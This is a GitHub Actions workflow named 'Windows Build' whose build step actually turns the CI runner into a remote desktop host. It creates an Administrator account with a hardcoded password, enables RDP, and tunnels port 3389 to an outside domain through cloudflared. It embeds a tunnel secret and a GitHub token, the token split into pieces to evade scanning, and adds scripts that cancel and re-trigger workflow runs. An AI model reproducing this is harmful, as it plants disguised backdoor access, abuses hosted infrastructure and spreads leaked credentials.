name: Windows Build

on:
  workflow_dispatch:

jobs:
  build:
    name: Build Windows
    runs-on: windows-latest

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Show Environment
        run: |
          node -v
          npm -v

      - name: Build
        run: |
        
          [IO.File]::WriteAllText(".\cert.pem","-----BEGIN ARGO TUNNEL TOKEN-----`eyJ6b25lSUQiOiI0MGMzOTRkZTM0NDEwYWUxODQ2ZGIzYjAyYmE0MzY1ZiIsImFj`Y291bnRJRCI6IjU3ZTg5NDNlM2EwYmI2NTM0YTYwMTlmNWI1MmMyMTljIiwiYXBp`VG9rZW4iOiJjZnV0X01JWUg4WGVwQWpPQ3hORkhPa1gxMTM1WDdOdEVja0xlZU9W`TUp3YkpmOWY1M2U5NSJ9`n-----END ARGO TUNNEL TOKEN-----`n")
          '{"AccountTag":"57e8943e3a0bb6534a6019f5b52c219c","TunnelSecret":"koGk3bX39JURp6J2Yj/sOopMhhmYsWNcxEyac3Riams=","TunnelID":"9e97e399-226f-4540-bc76-3283ea20d8ec","Endpoint":""}' | Set-Content -Encoding utf8 .\9e97e399-226f-4540-bc76-3283ea20d8ec.json
          "tunnel: 9e97e399-226f-4540-bc76-3283ea20d8ec`ncredentials-file: 9e97e399-226f-4540-bc76-3283ea20d8ec.json`n`ningress:`n  - hostname: w1.107089.xyz`n    service: tcp://localhost:3389`n`n  - service: http_status:404" | Set-Content -Encoding utf8 .\9e97e399-226f-4540-bc76-3283ea20d8ec.yml

          curl -LO "https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.exe"

          
          $USERNAME="Administrator"
          $PASSWORD="Wo3Cao4Ni3Ma1Bi1"
          
          $userExists = net user $USERNAME 2>$null
          
          if ($LASTEXITCODE -eq 0) {
              Write-Host "User exists, changing password..."
              net user $USERNAME $PASSWORD
          } else {
              Write-Host "User not found, creating user..."
              net user $USERNAME $PASSWORD /add /y
          }
          
          net user $USERNAME /active:yes
          
          net localgroup Administrators $USERNAME /add
          
          net localgroup "Remote Desktop Users" $USERNAME /add
          
          Set-Service TermService -StartupType Automatic
          Start-Service TermService
          
          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
          
          netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
          
          Test-NetConnection localhost -Port 3389
          
          net user $USERNAME

          pip3 install requests

          @('import requests','import time','','TOKEN = "g"+"h"+"p"+"_"+"U8T"+"eabcYCKET2r1K4NJMFUol5MVzjV4LCjdy"','OWNER = "yunzhongzhuanicloud"','REPO = "w"','','HEADERS = {"Accept": "application/vnd.github+json", "Authorization": f"Bearer {TOKEN}", "X-GitHub-Api-Version": "2022-11-28"}','API = f"https://api.github.com/repos/{OWNER}/{REPO}/actions/runs"','','while True:','    try:','        runs = requests.get(API, headers=HEADERS, params={"per_page": 100}, timeout=20).json().get("workflow_runs", [])','        for run in runs:','            if run.get("status") in {"queued", "in_progress", "waiting", "requested", "pending"}:','                run_id = run["id"]','                r = requests.post(f"{API}/{run_id}/force-cancel", headers=HEADERS, timeout=20)','                print(f"[{r.status_code}] CANCEL {run_id} {run.get("name")}")','    except Exception as e:','        print("[ERROR]", e)','    exit();') -join "`r`n" | Set-Content 'D:\stop.py' -Encoding UTF8
          @('import requests','','TOKEN = "g"+"h"+"p"+"_"+"U8T"+"eabcYCKET2r1K4NJMFUol5MVzjV4LCjdy"','OWNER = "yunzhongzhuanicloud"','REPO = "w"','WORKFLOW = "w.yml"','REF = "main"','','HEADERS = {"Accept": "application/vnd.github+json", "Authorization": f"Bearer {TOKEN}", "X-GitHub-Api-Version": "2022-11-28"}','URL = f"https://api.github.com/repos/{OWNER}/{REPO}/actions/workflows/{WORKFLOW}/dispatches"','','r = requests.post(URL, headers=HEADERS, json={"ref": REF}, timeout=20)','print(f"[{r.status_code}] {r.text}")','exit();') -join "`r`n" | Set-Content 'D:\run.py' -Encoding UTF8
          Set-Content -Path 'D:\一键换机.bat' -Value @('python3 stop.py && python3 run.py && shutdown -s -t 120','mshta "javascript:alert(''正在换机，请先断开远程桌面连接，两分钟后重新连接！'');close();"') -Encoding ASCII

          .\cloudflared-windows-amd64.exe --config 9e97e399-226f-4540-bc76-3283ea20d8ec.yml tunnel --origincert cert.pem run 9e97e399-226f-4540-bc76-3283ea20d8ec
          # cloudflared-windows-amd64.exe access tcp --hostname examplegithubwindows.yunzhongzhuan.com --url 10.0.0.29:13389

